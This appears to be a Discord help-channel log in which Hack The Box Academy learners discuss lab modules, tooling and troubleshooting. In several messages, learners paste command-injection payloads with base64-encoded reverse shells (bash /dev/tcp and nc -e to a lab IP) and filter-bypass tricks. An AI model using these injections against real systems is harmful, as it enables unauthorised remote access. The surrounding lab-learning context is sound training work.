#modules
Have you done this section? https://academy.hackthebox.com/module/227/section/2496 what should i do about the inetsim thing? it warns that the pwnbox is already connected via vpn (and that might cause issues?)
i mean, my vm would be connecting to vpn as well?
The reason they say use your own vm is bc the pwnbox has an external facing interface
Using your own vm allows you to lock down the network access and retain a lot of control
ok so connect my vm and down any external interfaces?
does that work after connecting to vpn?
What is meant by external interface is that the pwnbox literally has a public ip
im with you there
I haven't done this module so idk what all they have you analyze, but if it's a file, then you don't connect to a target
If there is no 'spawn target' button, there's no target to connect to
ah, ok

For anyone experiencing this same issue it seems that Powershell is interpreting the 1 at the beginning of the IP address as an index. The fix I found was to wrap everything in quotes. Ex. dig ns inlanefreight.htb '@1.1.1.1' You'll probably only be encountering this issue if you're connecting using PWNBOX
Hypothetical: If I've found a command injection vulnerability on a public-facing web app and I'm trying to run a reverse shell command. The reverse shell command should use my public IP address, right? Do I need to port forward the port on which my listener is active?
I'm asking since in all the web modules I've done, the web applications I've compromised are on the local network. So I was just wondering if I understood the concept for how things would work for an external facing web app since I've never pentested against an external facing web app.
Are you doing your testing from within a VM ?
I think you would have to port forward as well yh
That's usually from where I'd do it, so yeah.
Would I not need to port forward if I were running a bare metal attack machine?
I usually only catch stuff with ngrok, and burp collaborator
but i'd imagine you need to configure your firewall and maybe even portforward on your router even ?
Oh, I see, so it's what I expected it to be like. I was just asking since I'm near the end of the Penetration Tester Job Path and preparing to take the AEN blind.
It's usually all local on the AEN and in the exam
so you dont have to worry about attacking anything on the internet
Oh okay, cuz I was worried since they both said external pentest, so I thought I'd have to port forward on my router. Thanks for the ngrok tip though, hadn't occurred to me to use that for port forwarding instead of going through the trouble of setting the port forward on the router and restarting the router and all that hassle.
tl;dr: use ngrok
How do I do it with ngrok again? I've forgotten 💀
It was Domains and then I gotta start a tunnel, right?
How do you usually do it with ngrok?
read the documentation of ngrok
were you able to figure this out?
You an AQW player? (askin cuz of ur username)
hmm I think I played aq like 14 years ago when i was younger lol
I just like the word tbh 😄
Nice, it is a cool word 😂
Hello !
Looking for the syntax of an answer question for DACL Attacks I. The question - RIGHT_WRITE_OWNER allows modifying what attribute of an object?
The answer must be ||Security Descriptor's Owner||
But it doesn't work
nope. sick
what exactly does it mean by universal attack chain?
ah ok feel better soon. got a bit of a cough myself
hello guys, i'm trying to solve the EvilCUPS box. i've followed the ipsec video and i've downloaded the exploit from its github repo, then when i want to execute the test print job of my malicious machine to get a reverse shell i got this error on the cups dashboard "stopped
"Filter failed"" and when i go and see the python code i got this error too "Exception occurred during processing of request from ('10.10.11.40', 48740)
Traceback (most recent call last):
File "/usr/lib/python3.10/socketserver.py", line 683, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python3.10/socketserver.py", line 360, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python3.10/socketserver.py", line 747, in __init__
self.handle()
File "/usr/lib/python3.10/http/server.py", line 425, in handle
self.handle_one_request()
File "/usr/lib/python3.10/http/server.py", line 413, in handle_one_request
method()
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/server.py", line 101, in do_POST
self.handle_ipp()
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/server.py", line 140, in handle_ipp
ipp_response = self.server.behaviour.handle_ipp(
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 71, in handle_ipp
return command_function(ipp_request, postscript_file)
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 163, in operation_print_job_response
self.handle_postscript(req, psfile)
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 410, in handle_postscript
raise NotImplementedError
NotImplementedError
target connected, sending payload ..." so please anyone can help me
Is there someone I can DM about File Upload Attacks Skill Assessment? I've been stuck on this for days and I have tried a lot of combinations to no success.
DM me
hello, help please, i've been stuck here for 3 hours
Submit the contents of the flag.txt file in the /home/srvadm directory.
Attacking Enterprise Networks | Initial Access
i bypassed this filter in the previous theme but in Initial Access i can't, i used all methods for bypassing
i was not able to join your link
i tried to verify it but they told me to join the hack the box server and i'm already in
that's not part of the verification process
do this: #welcome message
there are four steps you need to follow
done i verified my self
Good job 👏
so what to do next ?
i go to the boxes channel then i ask my question or what ?
Yes
🆘
Bro I can't reverse shell
||curl 'http://monitoring.inlanefreight.local/ping.php?ip=127.0.0.1 'l's${IFS}'|| worked but when i try a reverse shell it always says invalid input
I've had nothing but issues with the tunneling lab machines.
ty
Have u tried base64
yes
Then ur messing something up
okay i will try thanks
||curl 'http://monitoring.inlanefreight.local/ping.php?ip= 'e'ch'o'${IFS}'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNi80NDQ0IDA+JjE='${IFS}|${IFS}base64${IFS}-d'|| | is wrong thing ? or What am I doing wrong?
good evening, can anyone help me with C# module ?
Howdy People, I'm working through the Password Attacks Medium lab. I have the logins for root, jason, and dennis, extracted and cracked the Docs.zip and the docx file, but the hint leads me to believe I need root's id_rsa to login as root. Any hints to get me to that end?
Meterpreter Tunneling & Port Forwarding lab boxes are just dying on me. I can't get a tunnel to last for more than a single command. @jolly cradle @surreal rain
did you try the ssh with the creds you found in the docx?
why are you pinging random people
@next bronze
whats up
Guys I'm new in this field
I want to learn cyber security and ethical hacking
And I need resources and guidance at free of cost
Pls help me to find resources
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
That’s not how they taught it in command injections
Yep and I get in, but have no access to root. I also searched for databases and ssh keys, checked for any crontabs under jason's account
It’s just unstable
I think meterpreter might be the worst way tbh
yeah I guess I'm just trying to recreate what the module has you do. I ended up just running the ping sweep manually
Please do not randomly ping people for help.
Your callback is likely being killed by AV
Hey, is it possible you can help explaining this?
The payloads in the red field are responding with “Only images are allowed” which means that these are likely filtered by the whitelist.
The rest are responding with “This extension is not allowed” meaning that these extensions are probably blacklisted.
So essentially, by now I should've figured out which extensions are blacklisted and I "only" need to figure out how to bypass the whitelist filtering.
I tried replicating your steps using the Character Injection Bash script to make an extension list with .phtml .phar .pgif. The only thing I see that I might've done differently is using jpg for the bash script and not png, but I don't see why that would make a difference since both are whitelisted?
I would assume it’s the content type that’s causing that
@rustic sage - Try changing to a different payload and/or setting a different EXIT FUNC on your payload. Could be killed by AV. Also in the future, if you want potentially faster responses, don't ping 2 admins of the community. Ask the community without pinging anyone and be patient.
@surreal rain Thanks for the help. I'll try that
but this also didn't work: || curl 'http://monitoring.inlanefreight.local/ping.php?ip=127.0.0.1 'b'ash<<<$(base64%09-d<<<bmMgMTAuMTAuMTYuMTYgNDQ0NCAtZSAvYmluL2Jhc2gK)'||
Hi. I've been stuck on the "Active Directory Enumeration & Attacks" module. I am currently stuck at the last question of the submodule "Domain Trust, Child Domain --> Parent Domain" or something like that. I can't figure out how I can extract the NT hash of the given User B. I have completed all steps of ExtraSids and compromised the DC.
I try to upload binaries of popular tools, but the output is not showing (or is showing as stdout)
check the .ssh folder, crack the password and try to log in with another account
didnt do that module yet but did you try mimikatz
I tried to to upload its binaries via cURL. But its only showing in stdout. and man the terminal is sick
can't do backspace, nothing
evil-winrm?
Hi am completing a module windows defender evasion
In static section it show
Ok - undetected by Microsoft Defender
But not giving flag.txt
If anyone completed this plz guide
try getting a meterpreter
There's no .ssh folder for jason or dennis and I can't access root's directory?
dennis should have a .ssh
imagine not doing ls -la
You are correct, I missed that, but jason has no permission to access anything in dennis. I'll keep wrestling with it, thank you for your help!
check for services running locally, you will find something that you can access
Meterpreter is out of the question. Though I did it through golden tickets and don't have hard credentials for the DC. The golden ticket is stored as a FILE
Okay, I'll keep digging
so I didnt find relevant flags for kerberos tickets( or i didn't get it)
Yeah idk what is up @shut quest why did you delete
can you try making responder listening on your machine
SQL injection assessment: https://academy.hackthebox.com/module/33/section/518
could write to a directory but dont know where to access it? How to find out?
what is the problem at the AD one? I didn't find the question
I can't upload any binaries in that session
here it is
in your attacker machine
i will check
maybe upload the file to a location you can access
think where web servers tend to be located on a linux based machine
given that you have DA on the target domain, just dcsync or extract from ntds
"Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer." ?
yeah you can do what Xre said, impacket-secretsdump from your linux machine
this is the question
instead of psexec you can use secretsdump -just-dc flag
even using xp_cmdshell to get a reverse shell doesn't work
please refrain from spoiling the AEN module
also you don't need to use the sql service to do anything
you'll need to use the built-in file manager

lets try that also
let me know if you got it
i also highly suggest finishing out AEN blind, not reading the questions or following any guides/module
the rest of what's in AEN is nothing you haven't encountered in some form before
just gotta enumerate; enumerate; enumerate
I do it blind and when I block I help myself a little ... but yes not so simple ...
pretty much everything on AEN is what's been covered by the course
didn't say it would be simple, but it is stuff you should know
don't look for any hints or nudges forward, gotta learn to unblock yourself -- treat it as the exam
IT WORKED
THANKS MAN
i didn't think of running the help of secretsdump. it accepts the same flags as psexec
well I know that you have to make a reverse shell from the but when I saw xp_cmdshell plus the priv allows by the user I understood directly which tools should be used, but only errors ...
you're putting the cart before the horse
nice
gotta figure out how to upload files first
I understand your reason well I’ll take a break and come back on it
i suggest googling the web framework in use and "how to upload files in <Web Framework> app"
thx 🙂
I know you can get through this; and don't be afraid to take several hours to figure it out
it's easy to want to reach for the instant gratification of "what do I do next"
but putting in the time and effort to research what you've run into helps develop a mindset
ta really says it’s real I’m in a hurry to switch to reverse shell instead of seeing the easiest thing
but I was able to unblock myself thanks a day to look in the void x)
not to mention how you're connected to it plays a role
document root & log is not writable --> permission issues - the only one which works is tmp but it's not accessible
may i have to fuzz directories?
nope
you're thinking too smart
think dumber
where are web server files located on linux
aka the webroot
does anyone know how to launch a .sh file on windows?
you install bash on windows
but fr why do you need to launch a .sh file on windows??
what academy module is this related to?
can I run it from visual too or not?
oml
why do you need to run a .sh on windows
.sh is a bash file, generally gonna be linux
windows executables are .exe
normally I was supposed to run it on vmware but I'm too lazy to install it and reconfigure everything
well that's a skill issue then
¯\_(ツ)_/¯
also you weren't "supposed to run it on vmware"
you're supposed to run it on a vm
:)
Oh yes ? because i use vmware to go to fedora and do my things on it
yes but you're not running it on vmware
you're running it on a vm
:) learn the difference
webroot = /var/www/html - can't think of another one
correct
ah yes yes, but I specifically want to do it on vmware
but its not writable
we're just dicing tomatoes at this point
should be
or maybe try writing to the folder you're in :)
I prefer potatoes
do most pentests end with DC compromise? or is it just a sweat dream?
it depends
on?
i mean is it that possible?
in which case you'd need to compromise the Enterprise Admin account
even sweater
but it all just boils down to; it depends -- if you couldn't compromise everything fully to DA then you just note what you could for the company to fix up or ignore
¯\_(ツ)_/¯
like a pentest is about discovering and reporting vulnerabilities in a network not just getting DA, DA is just a bonus
I mean sure, but like as on average, do people get DA that much?
IT DEPENDS
lol
there's a lot of factors that play into it
most companies that get a pentest done have some level of security maturity that would at least make it difficult
but not wholly impossible to reach DA
plenty of vulnerable things within Windows or installed apps that make it easy to privesc
but if a company has done their due diligence in locking down accounts, preventing NTLM use, etc. it is gonna be harder
solve it?
it also depends on the timeframe scope
Ok
thanks!
There are 2 ways to finish it
Can i send you a DM?
Sure
Check dm
I didn't delete anything not sure what is being referred to.
If anything mod/staff deleted what I said, not sure as to why, I try to keep things in the spirit of the academy.
Hi
anyone who has done Pass the Hash can help me ? Really stuck on "Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?" I must be dumb
Like I did use mimikatz to extract the hash of current session, also did it plenty of others ways
You can DM me. Include the section that you are in and the steps you have taken so far
I am going to sleep now. If someone else hasn't helped you by tomorrow feel free to DM then I will get to it when possible.
https://academy.hackthebox.com/module/77/section/843
When I try to run gobuster to enumerate directories it gives me an error "context deadline exceeded (Client.Timeout exceeded while awaiting headers)"
Why am I getting this error?
still on this?
Is HTB staff AFK?
why are u running gobuster on that
i dont think staff is module support 😭
Why not? I was chatting with an HTB founder earlier in here
g0blin was in the chat couple weeks ago
now I'm running nmap and I get "failed to resolve [target IP address]"
Why?
you dont need any of those tools for this
Why not? The section in this module starts with "Once we identify the services running on ports identified from our Nmap scan, the first step is to look if any of the applications/services have any public exploits. Public exploits can be found for web applications and other applications running on open ports, like SSH or ftp."
Need to know what kind of services are running to find exploits for them..
those sections have different machines
I booted up the target machine for this section of the module
is the Citrix Breakout module any less painful if I use the pwnbox?
possibly but still gonna be laggy regardless
RIP
The question at the end of the section " Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)"
In order to do that I need the nmap scan to work..
Said "No targets were specified"
if they give you a target with a port attached to it they want you to use that port
Yes, I left the port at the end of the IP address
Did sudo nmap 83.136.254.47:51866
Got error Failed to resolve [IP address...]
WARNING: No targets were specified
u didnt specify the port with -p
Go do some research on how to scan a specific port with nmap
they just want you to to open the ip on ur browser
also look at your hint
A previous section explained it but that was a few days ago and I had already forgotten that nmap needs tack p and won't recognize colon with port
File Inclusion
Skills Assessment - File Inclusion
I found the hidden page but after ||uploading a shell no commands|| seems to work I see nothing in the response on the page ||access.log|| page
Ok I don't know what the issue was but after resetting the box it worked
https://academy.hackthebox.com/module/77/section/726
Now I'm waiting on nmap to finish. The app is hanging and won't print anything
Did sudo nmap -sV -sC 83.136.254.47
Just sits there with "Starting Nmap 7.94SVN..."
Is there too much traffic on HTB?
you wont find the answer with nmap
i doubt that scan would find the port too
thats a different section?
the ip should be 10.129.x.x for that
OK it finally spit out a bunch of info. Why wouldn't I need to run nmap to find out what services are running so I can search for exploits for the apps and versions running for metasploit?
the question says "(note: the web server may take a few seconds to start)"
I now know that OpenSSH 9.2p1 is running
meaning the web server is on the port attached to the target
running nmap with the target web server and port specified all I get back is "Port 51866/tcp is closed with unknown service"
with nmap scanning the entire IP address no port specified, I find that 22/tcp is open and running OpenSSH 9.2p1
you just scanning for extra practice or what? 🤨
What can I do with a closed port with unknown service and unknown version #?
OK wow I just realized I was scanning an old target SMH
TLattice is right, you know it’s a web server. The hint even mentioned plugins. Just open the link and see what is running. Plug-ins make me think cms
Nmap would be needed if you had no information and didn’t know it was a web server. But in this case you know it is.
Just want to confirm for the Windows PrivEsc Interacting with Users section, is there a particular directory in the ||FS01|| share I'm supposed to create my file in? I've been waiting almost 10mins and no hits (other than my own user after creating the file).
the lnk file?
SCF file but yeh
yeh so I've put it in there & it "works" but it's only hitting my htb-student account, nothing else hits it
Hello! I am working on 'Lateral Movement' in the Attacking Enterprise Networks module and trying to proxychains nmap 3389 on 172.16.8.20 but it says it's filtered. It should be open for RDP? Is there something wrong with the VM or am I not doing it right?
as well as every possible sub-directory that's in the share I mentioned above - is there a different one I'm not seeing?
try sudo
lemme check
with sudo it says its closed
did you use the -sT flag also
sudo proxychains nmap -sT -p 3389 172.16.8.20
sudo proxychains nmap -sT -p 3389 172.16.8.20 -Pn
both of these
ah interesting resetting the box didn't clear my file from it either haha
the target? it didn't reset then
yeah just got it
the other ports are fine?
No, nothing gets scanned. Seems like I have to do all over again previous stuff from Internal Testing, to be able to continue
what are you using to pivot with
sudo ssh -D 8081 -i dmz01_key root@10.129.51.180
was just trying to do nmap on that 172 machine and then RDP since I have password.
Did it work after setting it up again?
sudo proxychains nmap -sT -p3389 172.16.8.20 -Pn
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-22 20:39 CDT
[proxychains] Strict chain ... 127.0.0.1:8081 ... 127.0.0.1:8081 ... 172.16.8.20:3389 <--socket error or timeout!
Nmap scan report for 172.16.8.20
Host is up (15s latency).
PORT STATE SERVICE
3389/tcp closed ms-wbt-server
Not sure tbh, try with sshuttle and see if that makes a difference
Might just need a restart
Could be worth trying while you are connecting to a vpn on your main box. A lot of my commands stopped working without vpn because my ISP flagged me
Or see if it works in pwnbox.
how do i solve this problem, i can't access web browsers on the instance, i tried restarting
if you have free pwnbox, your internet access is limited
why could i use it before but for a few days i haven't been able to use it, is it a new update?
Yeah something is wrong with Pwnbox. Just tried doing it on my own VM and have no problems with rdping or proxy nmap
Did everyone else experience near persistent instability with lab boxes in the Pivoting/Tunneling module? I'm using Pwnbox to rule out my own stuff and can't RDP into boxes either at all, or with near immediate disconnects. I then have to spam retry a connection and hope I get lucky.
cme is not running on pwnbox
command not found
i tried installing it still has issues
Use netexec
Netexec not installed?
are you just typing cme? the command is crackmapexec
yea it is
Netexec is nearly a 1 for 1 command wise for cme
ok i got it to run
but what's the difference between them and why isn't cme there
Because cme is no longer active, and the people that were active forked the repo into nxc
Faced this previously as well for the modules where there was need to RDP
bro i used winrm for the skill assessment 😭
i thought rdp was closed cause it just never worked
Hi,
Module: Attacking Common Applications
Section: Exploiting Web Vulnerabilities in Thick-Client Applications
Section link: https://academy.hackthebox.com/module/113/section/2164
I have managed to update the ClientGuiTest.java file, compile it, create a new jar file. Now when I go to FileBrowser > Configs, I see new files. However, when I enter fatty-server.jar as filename, it doesn't get downloaded as described in the section. Instead it just gets displayed. Why is it not being downloaded?
Got it, I also need to modify invoker.java to download the file!
i am on the medium lab in the footprinting section and i am stuck at the mssql server. i am connected to the target with rdp and ran sql server manager, there are databases but i can't figure out which table or which database to focus on
?
Hi Guys, I'm having trouble installing the wenum in Web Fuzzing module. Above is the screenshot. Is there any other way to install it?
I'm using this command : pipx install git+https://github.com/WebFuzzForge/wenum like it shown on the Web Fuzzing module.
you could assume which db to check by rereading the question
look through the question, it gives you a clue on which db to look into 😉
Port?
It just says find the password of user HTB
wenum is already installed for me
on pwnbox
what db would hold usernames
Users tables maybe
how to check the version of wenum? wenum --version?
I found the db but i don't understand how to print those. i mean there is a select query but when i give the absolute path to that table it gives invalid object, and if i give just the name of the table again the same error
wenum --help
i think ffuf would work better tbh
i just looked around when i did it, but there should be
Yep, tried with sudo install ffuf 😋
Even gobuster only got installed with sudo install, not with the command given in the module.
I'm going a little wonky trying to remember what i did a week ago in previous modules. I don't remember much about XSS attacks
I mean the notes help me remember but then ill forget again
thats what the notes are for
if you want to solidify the concept without notes then you need to repeatedly do xss
Hey, need some help with Footprinting Lab - Hard
I've found the next ports ||TCP: 22,110,143,993,995; UDP:161|| but have no idea where to go from now...
I mean my next thought would be to brute force each service but I don't think this is the intended way of solving the problem
well you have an ssh service, a pop3 service and an IMAP service with their SSL counterparts.
Yeah, but all of the services need some sort of authentication
Well the instructions give you a username, HTB
That's right
I mean, should I try bruteforce each service? because it doesnt fit right in my mind
hmmm.... i can't recall, does crackmapexec have an imap option
oh no wait you're not up to that yet.
what about snmp?
We didnt really talk about brute forcing yet.. this is why its a bit weird to me
it uses snmpv3 which doesn't use community strings (from what i understood)
use snmpwalk on it anyway
onesixtyone is for bruteforcing community strings only i think
i think snmpwalk is the right answer but i should get a user list
right, then you use braa to brute force the individual OIDs and enumerate the info in them
then try it
One tool gets the string, another tool actually reads the OID
[<string>] is part of the output
In the "File Upload Attacks" module section "Whitelist Filters" how on earth does that work? I found the right extension by following the tutorial but how would that extension ever get executed by the php interpreter?
hehehhe yeah what we said was on the right track.
It has been my mistake, its not snmpv3 which means i can run onesixtyone
Ugh i feel stupid because I wasted so much time on it
But how is it that NMAP shows that the service is running SNMPv3?
I don't remember how i did it exactly, i think i used intruder but the way i did it was running a command with the uploaded file to try and get an output
Yeah I figured out how to solve it. But I feel like that answer basically means someone setup Apache to send an extension very not php related to php in a way that would have to be really deliberate
onesixtyone works with it, snmpwalk I think does as well, but in the module the example uses 2c
Whitelist was a very hard portion of file uploads for me, I was equally frustrated by it
the whole point of snmpv3 that its more complex, and using user name, password and i think preshared-key
beginner here, I'm on the active directory basics, managing users in AD. It asks that I RDP into Phillip's account to prompt Sophie to change her password. When i go to RDP it's asking for a computer name, however the credentials given only give a username and password (no computer name). what am i doing wrong here?
The version is actually 2c
Its really weird
i see v2 in the braa output
I mean i never setup snmp on a network so i don't know too much about this
you don't rdp into an account, you rdp to a machine using an account.
got ya, but without a machine name doesnt that become an issue?
you just need an ip address
of the machine
The target machine should be in green on the section page.
Nmap isn't always accurate
40 mins of vpn hopping to get AEN spawned 💀
in the web attacks module, burp looks like in the screenshot below, but my burp does not have the response at the right side. is this different in new versions or can i configure this?
that's in repeater, you're probably looking at proxy
alright, yes this is the case
So with snmp, how can I make sure which version I'm using?
Because there is nothing that states this situation in the module?
Just try what's taught
Or use the --script banner in nmap to be sure
Either way always try what's taught first
I mean that's what I did
Information was still inaccurate..
I guess its part of the game
Don't worry about the situation
Assume what's being given to you is similar to what's taught
Hey im trying to solve the first one in the forensics category and i dont seem to be close no matter how i tried can anyone help me
Web Attack / Chaining IDOR Vulnerabilities
i've changed the email as requested, but i dont get how i receive the flag now?
@drifting grail could you please check your inbox. I 've sent an dm.
I think u need to fuzz the profile in burp and find an admin
i have found the admin and changed the email
Go back to the admin panel where it says about me or something and the flag should be there
In Intro to Assembly Language/Registers, Address and Data types. can you guys please help me to understand this "The big-endian processors would store these bytes as 00000001 10101010 left-to-right," How the 00000001 (least byte) was stored in left ? because the author specified "while with Big-Endian processors, the big-end byte is filled/retrieved first left-to-right." since the big-end byte should be stored first from left to right so the 10101010 should be on the left and 00000001 which results in 10101010 00000001 ?
chatgpt is pretty good in explaining assembly
yeah, my first ask was to that but it also confuses me more and switches answers if i continue to prompt it differently.
But in the Module:
That's why i thought its appropriate to ask in the module channel instead of trusting on chatgpt completely.
yes so the big endian stores the most significant byte first and the little endian the least significant byte first. the most significant byte is so to say the biggest value of the number....
for example the number: 1234
big endian stores: 12 and then 34
little endian stores: 34 and then 12
this is my understanding
okay but in the modules section, it was mentioned as the big bytes stores from left to right.
yes...isnt that what i also explained with the example...? for me it is a match...
0000000110101010 = 426
big endian = 426
little endian = 624 (only an analogy)
what is your goto documentation, do you summarize every page on every module? or only write key commands on each section?
@timber hatch the thing I was confused about was, as you can read in here, it was mentioned that the big end byte will be stored from left to right, and so in the given example it was mentioned that 00000001 10101010 was correct. but as the 10101010 byte was the big end byte and the 00000001 is the least end byte, if we store the big end byte at the left then the least end byte in the right (left-right) we should get 10101010 00000001 as the answer, right?
in the big endian example you mentioned, if we consider store the big end byte from left to right then we should get 34 and then 12 since the 34 is larger than the 12 so it should be stored first in the left side
isn't it results in 1?
no the number i meant like one thousand two hundred thirty-four
and then 1 is the biggest because it is the thousand
I am genuinely confused; in the module it was mentioned that it will be stored/retrieved byte by byte, by comparing which byte is smaller or larger according to the endianness.
2 bits are 1 byte
*8 bits
fk sorry, I just specified the bit by bit as byte by byte.
Sorry for the confusion. In the module it was specified that it will store the binary values bit by bit, by comparing which bit is smaller or larger according to the endianness. I mean in the example.
it stores byte by byte, and one byte is = 00000001 and the other is = 10101010
1 byte = 8 bits
no we have it right?
yeah, I knew this.
hey uh, I joined the VPN via OpenVPN and I want to ping my target but that doesn't work :d idk
can I DM you please, for clarification, if you don't mind?
yes
thanks, now it worked
is your OpenVPN config from before, or did you just download a new configuration file?
downloaded new file and also tried the old file
what lab/module were you trying to access?
all good, the problem is solved :d thanks for answering though
dw. nice name btw lol

Somehow HTB Academy doesn't show me hints. Any fix?
Hey guys, please note that to use ffuf on Pwnbox you will have to install it using sudo apt install ffuf, and that crackmapexec is now netexec
Not all tasks include hints
I mean I click on the yellow hint button and nothing happens
the site somehow gets bigger but there's no hint message
deactivate all ad blockers and then try again
Any change in the wenum installation? I'm having trouble installing it.
This is a dumb question, but in the module Windows Attacks & Defense they ask me to use the file passwords.txt to crack the hashes, but it says there's no such file in the directory. Here are my questions.
Where is the file on the machine given?
Is there a way to make my machine scan without a complete file path?
Yeah, I either did that or just stole the flag from the solution. It wasn't worth losing any more time
can you link the section? I think I've done this one
Hello guys, I'm on the File Uploads module, on the skills assessment section. I was able to read the source code of upload.php and find the directory where it is storing my file and the file name scheme, but I'm still getting a 404 not found
Hey guys, I need a hint for the Skills Assessment - SQL Injection Fundamentals.
I don't want to look up the write-up because I want to learn after all, but I am stuck. I can't even get anything out with the injection techniques that are in the lessons.
try some different extensions
even flip them
oh actually, make sure you really know the naming scheme
Can I DM you?
sure
where did you get stuck?
explain your ongoing progress
Oh hold on, I might have gotten myself unstuck 🙂
All done, it was pretty easy actually. I just got a bit stuck in the beginning
hey y'all, I have a lil problem on the Footprinting module -> lab medium
found creds on an SMB share for MSSQL but can't log in with them?
Try another user or password
mind if I DM ya
sure, you can send me a DM
Does anyone know why this command for this question doesn't work? It's at Linux Fundamentals / Find Files and Directories
anyone else currently on information security?
try putting your find command inside ls -la
ls -la $(find / -type etc...)
Nothing happens
remove the -exec ls -la ...
A few hundred lines of text like this
you forgot the 2>/dev/null at the end
in your last command you used type instead of find. it's also missing the directory to search: /
I'm a girl, mate
lool
sorry, it's really not the place to

Idk what's the fkn place 😭 I'm new here, how do you even use this app
Like what server do I even
💔💔
Bruh, I forgot I terminated SSH
Hack your ex bf then
Someone, please help me with what's going on. I tried spawning the instance but it doesn't even work😭
Hiii!! This is a discord server for a CTF (Capture The Flag) Challenge.
Yes
You're welcome
Anything we can help you with ?
https://forum.hackthebox.com/t/kerberos-attacks-skills-assessment/303926/8
How do I connect to the ||SERVERxx|| machine from inside the SSH instance?
Greetings all. I'm working through the CPTS "Documentation & Reporting Practice Lab" and have rearranged all of the notes to get some orientation. I've found the LFI and would like to exploit it for (I assume) the command injection, but none of the attacks in the notes seem to work. I'm obviously missing something and have looked at HTB forum posts and searched Discord for hints. I assume the next step is to somehow read the index.php file for config using encoding, but I'm a bit stuck. Any pointers here pls?
Ah, think I may just have solved it. Seems it's pretty basic and was staring me right in the face in the "command injection" module.
HTB is using the <img src tag on their pages
so try starting with " as your starting character
Hey thanks a lot. I actually figured it out and completed the skill assessment.
I am not sure we are talking about the same thing. the <img src tag wasn't involved in the method I used
SQL Injection: Assessment --> could read the flag through a webshell
I'm wondering if it is also possible to establish a reverse shell out of a webshell for this specific task?
I have a problem submitting the right answer in the module Detecting Windows Attacks with Splunk, section Detecting Pass-the-Hash
hey, I am at Footprinting Lab - Hard and I guessed the creds for SNMP; is there another way to get them?
how did you guess the creds for snmp
actually, you could try to brute-force community strings
and you would get the same answer
I mean you can use the tool referred to in the module
ok thx
good question. I haven't tried.
One day soon I will be hackerman
has anyone recently had any luck with the Linux Privilege Escalation - Logrotate section?
I haven't been able to get it to work, even with simple payloads that just create a file on the target system
got it
simply wasn't working
had to keep trying
race condition moment
not a great demo for a learning module
module: Linux Privilege Escalation
section: Linux Services and Internal Enumeration
I'm having trouble finding the latest Python version; I put in like four different versions and used various commands
no problem
Hi guys, I need help with the last question:
"Connect to the WiFi network and submit the flag found at IP 192.168.2.1."
I can't connect even after following the steps, I even tried changing my MAC address. Any clues?
Hi guys, I'm asking for help. I'm running a lab on HTB using the web_delivery Metasploit module, and for some reason it gives this error
SRVHOST should be your own IP
Hello, I have a question: am I supposed to browse answers for HTB Academy questions? I'm at module 18 of the Linux learning path, on the Filter Contents section, and there are some weird questions that I think the average reader wouldn't know, like "How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)". I've got no idea how to discover the answer, because no tools were mentioned for finding out how to discover the services etc.
Google search…. If you want it easy, ChatGPT
wait, what I wrote maybe gave too much info, so I deleted it. my tip is: use netstat with the -tuln flags
I guess it would be better to have questions answerable from only the stuff you read
as far as I know, Linux Fundamentals is the only module that requires you to do a lot of your own research to answer the questions
Damn, but i learned a lot of stuff from it
I switched to Linux Mint on my actual desktop
it helps a lot
Imo most of the tools you'll use are given in like the first page or two of that module
It's a list of tools with a brief description
I think there are some in the cheat sheet
I never check that, should prob check it more
Reading the content is generally useful
And no, I wasn't referring to the cheat sheet
read the sections, also read the friendly manual
wdym friendly manual
man <tool>?
man
pretty helpful
with these tips i should be able to actually pass these questions
and googling too
if you're using tmux, split the pane and have the man page open in one pane
tmux is like multiple terminals?
terminal multiplexer
tmux is a terminal emulator that allows you to split panes and things like that
so it helps with OpenVPN
OpenVPN is annoying because it makes 1 terminal unusable
until you terminate the process
I have a window dedicated to OpenVPN
Yeah i actually have it running on its own workspace
y'all don't close it?
how do you do that
closing it kills the connection
if I bg it I forget about it
I just click the x on Kali and it runs in the background
on mint
try it out 🤷♂️ don't know how it would work with that terminal
lemme see on Kali
true
on Kali it doesn't give any warning
hello
If it helps to see -- I keep a utilities tab open for VPN, SMB share, webserver and my initial nmap output. I got into the habit of ctrl + shift + d to split terminals quickly
hey guys, I'm on the Pivoting, Tunneling, and Port Forwarding module and have a problem with the chisel section. after cloning the chisel tool and launching the go build command, and after transferring chisel to the pivot host, I can't launch the server; I get this error
I need a little nudge with these questions from the password attack module. Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam." Once successful, log in with SSH and submit the contents of the flag.txt file as your answer. Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. please
What did you already do?
I found the SSH, WinRM, and RDP keys, but only the SMB one is giving me trouble.
but you need to connect with SSH, so why are you searching for the SMB creds?
OK. This question, "Create a mutated wordlist using the files in the ZIP file under 'Resources' in the top right corner of this section. Use this wordlist to brute force the password for the user 'sam.' Once successful, log in with SSH and submit the contents of the flag.txt file as your answer," I haven't found it yet. I don't know which hashcat rule to combine with the password.list to find the credential for 'sam.'
you just have to run the exact same command as in the module. did you download the zip file from the resources?
I remember a lot of people had problems with that part. when you use hydra, how much time does it take to go through the whole file?
Yes, I already downloaded the ZIP. Let me try it again. Thank you so much, bro; you are my hero.
I have the password, but try again and if it doesn't show up I will help you further; I already helped a lot of people with the same problem in the same section 🤣
I made a file with 1,494 lines, and it took 16 minutes.
hahahahahaha omg brooo
Yes, I use that, but different passwords. Do I have to use that one exactly?
